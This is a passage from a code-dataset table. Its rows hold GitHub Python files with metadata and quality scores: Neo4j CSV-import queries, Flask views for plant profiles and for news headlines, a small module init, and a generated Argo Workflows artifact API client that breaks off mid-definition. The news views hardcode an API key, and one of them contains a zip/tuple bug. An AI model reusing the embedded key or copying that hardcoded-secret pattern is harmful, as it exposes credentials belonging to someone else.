hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9667ea21adaae4ab4839643cbcf1d90a5df78543 | 2,083 | py | Python | python/query_changes.py | davidmeza1/ksat | d0d76d6260752ff242549240ef82ca89f2dc6d83 | [
"MIT"
] | 11 | 2020-10-20T19:47:50.000Z | 2022-03-03T06:46:50.000Z | python/query_changes.py | davidmeza1/ksat | d0d76d6260752ff242549240ef82ca89f2dc6d83 | [
"MIT"
] | 1 | 2020-09-01T17:11:07.000Z | 2020-09-08T21:42:34.000Z | python/query_changes.py | davidmeza1/ksat | d0d76d6260752ff242549240ef82ca89f2dc6d83 | [
"MIT"
] | 5 | 2020-09-10T04:34:17.000Z | 2022-03-03T06:46:55.000Z | query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///TechnologySkills.csv' AS line
RETURN line
","
MATCH (o:Occupation {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Commodity {commodityID: toInteger(line.`Commodity Code`)})
MATCH (t:Technology_Skills {elementID: '5.F.1'})
SET m:Technology_Skills
REMOVE m:Commodity
MERGE (m)-[r:Sub_Element_Of]-(t)
MERGE (p:Tech_Skill_Product {title: line.Example})
ON CREATE SET p.hottech = line.`Hot Technology`
WITH o, m, p, line
MERGE (m)-[:Technology_Used_In]->(o)
MERGE (p)-[:Technology_Product]-(m)
",{batchSize:10000})""") #29370
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///TechnologySkills.csv' AS line
RETURN line
","
MATCH (o:Workrole {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Technology_Skills {commodityID: toInteger(line.`Commodity Code`)})
MERGE (p:Tech_Skill_Product {title: line.Example})
ON CREATE SET p.hottech = line.`Hot Technology`
WITH o, m, p, line
MERGE (m)-[:Technology_Used_In]->(o)
MERGE (p)-[:Technology_Product]-(m)
",{batchSize:10000})""") #29370
# Tools
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///ToolsUsed.csv' AS line
RETURN line
","
MATCH (o:Occupation {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Commodity {commodityID: toInteger(line.`Commodity Code`)})
MATCH (t:Tools {elementID: '5.G.1'})
SET m:Tools
REMOVE m:Commodity
MERGE (m)-[r:Sub_Element_Of]-(t)
MERGE (p:Tool_Product {title: line.Example})
ON CREATE SET p.hottech = 'N'
WITH o, m, p, line
MERGE (m)-[:Tools_Used_In]->(o)
MERGE (p)-[:Tool_Product]-(m)
",{batchSize:10000})""") #42278
query_list.append("""CALL apoc.periodic.iterate("
LOAD CSV WITH HEADERS
FROM 'file:///ToolsUsed.csv' AS line
RETURN line
","
MATCH (o:Workrole {onet_soc_code: line.`O*NET-SOC Code`})
MATCH (m:Tools {commodityID: toInteger(line.`Commodity Code`)})
MERGE (p:Tool_Product {title: line.Example})
ON CREATE SET p.hottech = 'N'
WITH o, m, p,line
MERGE (m)-[:Tools_Used_In]->(o)
MERGE (p)-[:Tool_Product]-(m)
",{batchSize:10000})""") #42278 | 32.546875 | 75 | 0.718675 | 330 | 2,083 | 4.424242 | 0.193939 | 0.038356 | 0.041096 | 0.052055 | 0.931507 | 0.931507 | 0.931507 | 0.880822 | 0.880822 | 0.880822 | 0 | 0.023379 | 0.096495 | 2,083 | 64 | 76 | 32.546875 | 0.752391 | 0.012482 | 0 | 0.9 | 0 | 0 | 0.945446 | 0.295178 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
96979a91c18e29d4fe62244c62aea457d76b030b | 3,782 | py | Python | app/plant_profiles/views.py | hydrobase/core_app | 8cac7049d21c077eaf7e1d363f2e48165aa39c21 | [
"MIT"
] | null | null | null | app/plant_profiles/views.py | hydrobase/core_app | 8cac7049d21c077eaf7e1d363f2e48165aa39c21 | [
"MIT"
] | 29 | 2016-02-28T23:24:44.000Z | 2017-12-25T05:56:41.000Z | app/plant_profiles/views.py | hydrobase/core_app | 8cac7049d21c077eaf7e1d363f2e48165aa39c21 | [
"MIT"
] | 8 | 2016-02-24T18:38:17.000Z | 2020-06-21T15:09:30.000Z | from flask import Blueprint, render_template, request, url_for, redirect
from app import db, login_manager, pubnub
from flask.ext.login import login_required, current_user
mod_plant_profiles = Blueprint('plant_profiles', __name__)
@mod_plant_profiles.route('/plant_profiles/', methods=['GET'])
@mod_plant_profiles.route('/plant_profiles/<cur>/<first>', methods=['GET'])
# @mod_plant_profiles.route('/plant_profiles/<cur>/<first>/<shift>', methods=['GET'])
@login_required
def list_plant_profiles(cur=1, first=1):
search = False
num_profiles = db.plant_profiles.find().count()
skip = (int(cur)-1) * 8
lim = 8
if num_profiles%lim == 0:
pages = (num_profiles/lim)
else:
pages = (num_profiles/lim)+1
device_list = []
grows_list = []
plant_list =[]
username = current_user.get_id()
devices = db.devices.find({'username': current_user.get_id()})
for device in devices:
device_list.append((device['device_name'], device['type'], \
device['sensors'], device['actuators'], device['kit'], device['device_id']))
grows = db.grows.find({'username' : current_user.get_id()})
for grow in grows:
grows_list.append((grow['grow_name'], grow['device_name']))
plants = db.plant_profiles.find().skip(skip).limit(lim)
for plant in plants:
plant_list.append(plant)
return render_template('plant_profiles/plant_profiles.html', username=username, my_devices=device_list,\
my_grows=grows_list, my_plants=plant_list, pages=pages, cur=int(cur), first=int(first), search=search)
@mod_plant_profiles.route('/plant_profiles_next/<cur>/<first>', methods=['GET'])
@login_required
def next_plant_profiles(cur=1, first=1):
first = int(first) + 1
cur = int(cur) + 1
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/plant_profiles_prev/<cur>/<first>', methods=['GET'])
@login_required
def prev_plant_profiles(cur=1, first=1):
first = int(first) - 1
if int(cur) > first+2:
cur = first+2
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/plant_profiles_first', methods=['GET'])
@login_required
def first_plant_profiles():
first=1
cur=1
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/plant_profiles_last', methods=['GET'])
@login_required
def last_plant_profiles():
num_profiles = db.plant_profiles.find().count()
lim = 8
if num_profiles%lim == 0:
pages = (num_profiles/lim)
else:
pages = (num_profiles/lim)+1
first=pages-2
cur=pages
return redirect(url_for('plant_profiles.list_plant_profiles', cur=cur, first=first))
@mod_plant_profiles.route('/search_plant_profiles', methods=['GET'])
@login_required
def search_plant_profiles(cur=1, first=1, shift="no change"):
search = True
num_profiles = db.plant_profiles.find().count()
skip = (int(cur)-1) * 8
lim = 8
if num_profiles%lim == 0:
pages = (num_profiles/lim)
else:
pages = (num_profiles/lim)+1
device_list = []
grows_list = []
plant_list =[]
username = current_user.get_id()
devices = db.devices.find({'username': current_user.get_id()})
for device in devices:
device_list.append((device['device_name'], device['type'], \
device['sensors'], device['actuators'], device['kit'], device['device_id']))
grows = db.grows.find({'username' : current_user.get_id()})
for grow in grows:
grows_list.append((grow['grow_name'], grow['device_name']))
plants = db.plant_profiles.find({"common_name": request.args.get('search')})
for plant in plants:
plant_list.append(plant)
return render_template('plant_profiles/plant_profiles.html', username=username, my_devices=device_list,\
my_grows=grows_list, my_plants=plant_list, pages=pages, cur=int(cur), first=int(first), search=search)
| 36.019048 | 105 | 0.73559 | 559 | 3,782 | 4.72093 | 0.127013 | 0.20197 | 0.060629 | 0.06366 | 0.846912 | 0.817355 | 0.76241 | 0.72338 | 0.72338 | 0.72338 | 0 | 0.00855 | 0.10312 | 3,782 | 104 | 106 | 36.365385 | 0.769458 | 0.021946 | 0 | 0.666667 | 0 | 0 | 0.162243 | 0.093174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.033333 | 0 | 0.166667 | 0.022222 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7375ae87a4899e763c25448b70cf0a0bdc8d9848 | 247 | py | Python | pysatMissions/methods/__init__.py | pysat/pysatMissions | 830c951adf85f670b5eea5400ce7884a072e4bbd | [
"BSD-3-Clause"
] | 7 | 2020-02-25T22:15:15.000Z | 2022-01-20T16:54:02.000Z | pysatMissions/methods/__init__.py | pysat/pysatMissions | 830c951adf85f670b5eea5400ce7884a072e4bbd | [
"BSD-3-Clause"
] | 57 | 2020-01-28T21:18:32.000Z | 2022-03-22T20:08:41.000Z | pysatMissions/methods/__init__.py | pysat/pysatMissions | 830c951adf85f670b5eea5400ce7884a072e4bbd | [
"BSD-3-Clause"
] | null | null | null | """
pysatMissions.methods is a module that provides
the methods to interface with numerous empirical model packages
"""
from pysatMissions.methods import magcoord
from pysatMissions.methods import spacecraft
__all__ = ['magcoord', 'spacecraft']
| 24.7 | 63 | 0.805668 | 29 | 247 | 6.724138 | 0.689655 | 0.307692 | 0.246154 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125506 | 247 | 9 | 64 | 27.444444 | 0.902778 | 0.449393 | 0 | 0 | 0 | 0 | 0.140625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fb3f919f396a7144b61777423c54fccc4b5359e3 | 1,949 | py | Python | app/main/views.py | Mel-001/News-API | 62e05c929bcea9229255894dace4900131e0a0db | [
"MIT"
] | null | null | null | app/main/views.py | Mel-001/News-API | 62e05c929bcea9229255894dace4900131e0a0db | [
"MIT"
] | null | null | null | app/main/views.py | Mel-001/News-API | 62e05c929bcea9229255894dace4900131e0a0db | [
"MIT"
] | null | null | null | from flask import render_template
from newsapi import NewsApiClient
from . import main
@main.route('/')
def index():
newsapi = NewsApiClient(api_key="8d21ef3a971c46e88b1d74d2055ca276")
topheadlines = newsapi.get_top_headlines(sources="fox-news")
articles = topheadlines['articles']
# print(articles)
desc = []
news = []
img = []
url = []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
url.append(myarticles['url'])
mylist = zip(news, desc, img, url)
return render_template('index.html', context= mylist)
@main.route('/bbc')
def bbc():
newsapi = NewsApiClient(api_key="8d21ef3a971c46e88b1d74d2055ca276")
topheadlines = newsapi.get_top_headlines(sources="bbc-news")
articles = topheadlines['articles']
desc = []
news = []
img = []
url=[]
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
url.append(myarticles['url'])
mylist = zip(news, desc, img, url)
return render_template('bbc.html', context=mylist)
@main.route('/cbc')
def cbc():
newsapi = NewsApiClient(api_key="8d21ef3a971c46e88b1d74d2055ca276")
topheadlines = newsapi.get_top_headlines(sources="cbc-news")
articles = topheadlines['articles']
desc = []
news = []
img = []
url =[]
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
url.append(myarticles['url'])
mylist = zip(news, desc, img), url
return render_template('cbc.html', context=mylist) | 23.202381 | 71 | 0.631606 | 202 | 1,949 | 6.029703 | 0.212871 | 0.157635 | 0.05665 | 0.064039 | 0.850575 | 0.807882 | 0.807882 | 0.807882 | 0.807882 | 0.807882 | 0 | 0.04186 | 0.227809 | 1,949 | 84 | 72 | 23.202381 | 0.767442 | 0.007696 | 0 | 0.703704 | 0 | 0 | 0.13761 | 0.049664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
83838dcbe9495011bfe3814c80a564c451aab2fe | 28,839 | py | Python | sdks/python/client/argo_workflows/api/artifact_service_api.py | momom-i/argo-workflows | 926b413f4d5cc615ea495160de74d8822ea8edf1 | [
"Apache-2.0"
] | null | null | null | sdks/python/client/argo_workflows/api/artifact_service_api.py | momom-i/argo-workflows | 926b413f4d5cc615ea495160de74d8822ea8edf1 | [
"Apache-2.0"
] | 18 | 2022-02-01T23:09:58.000Z | 2022-03-31T23:28:41.000Z | sdks/python/client/argo_workflows/api/artifact_service_api.py | dpadhiar/argo-workflows | ed351ff084c4524ff4b2a45b53e539f91f5d423a | [
"Apache-2.0"
] | null | null | null | """
Argo Workflows API
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. For more information, please see https://argoproj.github.io/argo-workflows/ # noqa: E501
The version of the OpenAPI document: VERSION
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from argo_workflows.api_client import ApiClient, Endpoint as _Endpoint
from argo_workflows.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from argo_workflows.model.grpc_gateway_runtime_error import GrpcGatewayRuntimeError
class ArtifactServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __get_artifact_file(
self,
namespace,
id_discriminator,
id,
node_id,
artifact_name,
artifact_name2,
artifact_discriminator="outputs",
**kwargs
):
"""Get an artifact. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_file(namespace, id_discriminator, id, node_id, artifact_name, artifact_name2, artifact_discriminator="outputs", async_req=True)
>>> result = thread.get()
Args:
namespace (str):
id_discriminator (str):
id (str):
node_id (str):
artifact_name (str):
artifact_name2 (str):
artifact_discriminator (str): defaults to "outputs", must be one of ["outputs"]
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['id_discriminator'] = \
id_discriminator
kwargs['id'] = \
id
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
kwargs['artifact_discriminator'] = \
artifact_discriminator
kwargs['artifact_name2'] = \
artifact_name2
return self.call_with_http_info(**kwargs)
self.get_artifact_file = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerToken'
],
'endpoint_path': '/artifact-files/{namespace}/{idDiscriminator}/{id}/{nodeId}/{artifactDiscriminator}/{artifactName}',
'operation_id': 'get_artifact_file',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'id_discriminator',
'id',
'node_id',
'artifact_name',
'artifact_discriminator',
'artifact_name2',
],
'required': [
'namespace',
'id_discriminator',
'id',
'node_id',
'artifact_name',
'artifact_discriminator',
'artifact_name2',
],
'nullable': [
],
'enum': [
'id_discriminator',
'artifact_discriminator',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('id_discriminator',): {
"WORKFLOW": "workflow",
"ARCHIVED-WORKFLOWS_": "archived-workflows "
},
('artifact_discriminator',): {
"OUTPUTS": "outputs"
},
},
'openapi_types': {
'namespace':
(str,),
'id_discriminator':
(str,),
'id':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
'artifact_discriminator':
(str,),
'artifact_name2':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'id_discriminator': 'idDiscriminator',
'id': 'id',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
'artifact_discriminator': 'artifactDiscriminator',
'artifact_name2': 'artifactName',
},
'location_map': {
'namespace': 'path',
'id_discriminator': 'path',
'id': 'path',
'node_id': 'path',
'artifact_name': 'path',
'artifact_discriminator': 'path',
'artifact_name2': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_artifact_file
)
def __get_input_artifact(
self,
namespace,
name,
node_id,
artifact_name,
**kwargs
):
"""Get an input artifact. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_input_artifact(namespace, name, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
namespace (str):
name (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['name'] = \
name
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_input_artifact = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerToken'
],
'endpoint_path': '/input-artifacts/{namespace}/{name}/{nodeId}/{artifactName}',
'operation_id': 'get_input_artifact',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'required': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'namespace':
(str,),
'name':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'name': 'name',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'namespace': 'path',
'name': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_input_artifact
)
def __get_input_artifact_by_uid(
self,
namespace,
uid,
node_id,
artifact_name,
**kwargs
):
"""Get an input artifact by UID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_input_artifact_by_uid(namespace, uid, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
namespace (str):
uid (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['uid'] = \
uid
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_input_artifact_by_uid = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerToken'
],
'endpoint_path': '/input-artifacts-by-uid/{uid}/{nodeId}/{artifactName}',
'operation_id': 'get_input_artifact_by_uid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'uid',
'node_id',
'artifact_name',
],
'required': [
'namespace',
'uid',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'namespace':
(str,),
'uid':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'uid': 'uid',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'namespace': 'path',
'uid': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_input_artifact_by_uid
)
def __get_output_artifact(
self,
namespace,
name,
node_id,
artifact_name,
**kwargs
):
"""Get an output artifact. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_output_artifact(namespace, name, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
namespace (str):
name (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['namespace'] = \
namespace
kwargs['name'] = \
name
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_output_artifact = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerToken'
],
'endpoint_path': '/artifacts/{namespace}/{name}/{nodeId}/{artifactName}',
'operation_id': 'get_output_artifact',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'required': [
'namespace',
'name',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
